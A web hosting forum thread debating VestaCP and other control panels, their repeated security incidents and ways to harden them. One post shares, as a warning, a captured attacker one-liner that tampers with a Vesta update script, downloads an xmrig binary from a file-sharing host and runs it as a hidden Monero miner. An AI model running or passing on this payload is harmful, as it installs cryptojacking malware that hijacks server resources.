New on LowEndTalk? Please Register and read our Community Rules.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
Comments
imo virtualmin is not that userfriendly and visually attractive.
And also the easiest to use for clients after Sentora (almost dead)
So what? Do their users provide hosting for free?
I think we should once more leave religion behind and think straight and rational. The decisive factor for software is not whether it's open source but QUALITY (good design, reliability, safety, ...).
True, there is a ton of mediocre or even poor commercial and closed source software out there. But the same is true for open source.
The problem is that software engineers just like mechanical engineers or architects have to have (and get and pay for) some good education and to amass a good amount of experience unter their belts to be good engineers. And they need to pay for rent, more education, to eat, etc. just like every other engineer. So there is a quite strong tendency that good software engineers will do the majority of their work for payment. Most simply have to.
Just giving a heads up. Hit a case of this with a monero miner. They injected a backup config for sftp so the miner woluld reinfect on a cron. I went and just deleted the whole API folder.
Below is the payload.
echo '#!/bin/sh'>../../bin/v-update-sys-vesta;cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/beedb/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/nullVestaCP is a really good panel, the problem is the abandonment by the developers.
Except it isn't abandoned at all. Do you follow the project?
Question, why was op banned?
Kind of.. They just dont give a f*** about open issues and pull requests...
Huh? VestaCP is a steaming pile of garbage that is practically bent over begging for hacker penetration. Personally when I see people or companies using it I instantly make assumptions about their lack of technical expertise and professionalism. But hey, to each their own.
Ban evasion, 5 duplicate accounts, etc
He knew his end was nigh.
That's shooting from a big canon. Would you mind to elaborate/provide some evidence for that assertion?
(I guess you might be right but still hefty assertions like the one you made here require some evidence/elaboration).
Personally when I see people instantly make assumptions about companies technical expertise and professionalism by just looking at what products they might be using, it's giving me diabetes. But hey, to each their own.
I'm a big fan of VestaCP, even with all of it's flaws (and there's a lot of them) I still prefer using it over most other control panels. It's so much easier to modify compared to any other panel I've used so far which is a big selling point for me.
I really wish they would run a second admin panel just for the API. This API could then be easily firewalled off to certain IPs. By default, have the port blocked.
Aye. I mean, frankly, would be easier to take extra measures to secure it for your own usage than many others. Think about putting cpanel behind http auth, for example, without it freaking out on you later. Like a 60 second job on Vesta that runs without caring for years at this rate.
For me, I've disabled the API and will soon be disabling admin UI and shell access. Doesn't fix all possible exploits but severely limits attack vectors. Granted I'm not talking about selling anything on them (just the people on them, who already know the risks).
This entire thread has given me diabetes.
Is VestaCP safe to use again?
Thanks.
As much as a gun. If you know how to use it and are aware of the risks & give thought to measures that prevent abuse it's all good^^
@Falzo @jsg @AuroraZ
Your guy's favorite control panel got hacked again.
https://forum.vestacp.com/viewtopic.php?f=10&t=17641
Seems they simply logged in via SSH as the admin user.
I don't have a guy here. And more importantly, I dislike all panels not at last due to grave security concerns. I just happen to think that a statement like "XYZ is a pile of garbage" should at least be accompanied by some information and facts.
What is this with your the end troll ?
Do
Ha ha ... He doesn't know what us Lenk and link and plox is please.
Min vestacp pros and cons?
And reasonable resources needed?
lol. proof or didn't happen :-P
to be honest, there is not much to be seen so far, as already mentioned in the other thread.
agreed - it seems related to servers running vestacp, yet there is so much information missing.
no one really posted what malware exactly and where it was located, what timestamps, there obviously are no cron entries and stuff to keep it running etc.
I saw some etc and log-files from an 'infected' server and despite the last auth.log and secure were deleted, there was nothing really interesting to see. no changes to files in /etc so no cron-stuff there, passwd and shadow untouched ...
only thing I noticed was that the server was running ssh on port 22 with obviously no restriction on what users could login (default setup). so the vesta user admin which can sudo could easily log in, if the password had been compromised or brute forced. this f.i. could have happened with the last hack already and if the admins didn't change those passwords... shit happens.
would be interesting to hear from affected people with 20-30 VMs if they had the same setup on all of those machines, maybe even the same admin-pw for easier management or old ones? ssh access allowed for admin? so yeah. blame it on vesta, that's the easiest way.
I have servers in OVH running vesta. so far nothing happened. did I mention that the admin account does not have ssh access on any of them? however, of course vesta could come with more restrictive settings in the beginning.
after all I am not here to defend Vesta or any other panel. I didn't like how Sergej the main developer handled the last incident anyway.
and I agree with @jsg that panels often make things worse when it comes to security, because most who use such things don't know or don't care until they got hacked.
still I'll continue using panels (including vesta), if I think I am capable of handling them and their surroundings properly and not just relying blindly on anything that came with it out of the box.
@Falzo I wish I had your confidence that Vesta was safe after so many incidents.
For what it's worth I have two VestaCP based systems that I just can't disable on a whim. The customers on them know that I considered it more risky than the new platform, but they wanted it, so it's this right balance of "They know the risks" and "I'm willing to hold off on action until I see more data." These two servers are reasonably high value targets so I'm obviously watching them very closely.
To be fair, I've disabled API access and Roundcube is only accessible in a manual installation under a privileged user account.
I also have an additional avenue for data to know if VestaCP instances are being compromised in bulk, from arguably the highest value IP ranges from the last vulnerability. I'm not currently seeing evidence of it.
Again not to say there is no vulnerability, there may well be, but if someone has a vulnerability in hand they are not using it very well if they have any degree of automation running for the exploits.
I don't mean "Vesta overall", but most people really don't secure things properly.. well, at all, but either way a part of these issues have always been related to Vesta. Maybe Vesta should include a security guide during install...
So, I guess back to cwp ?
It really isn't bad, just the UI is kinda wonky.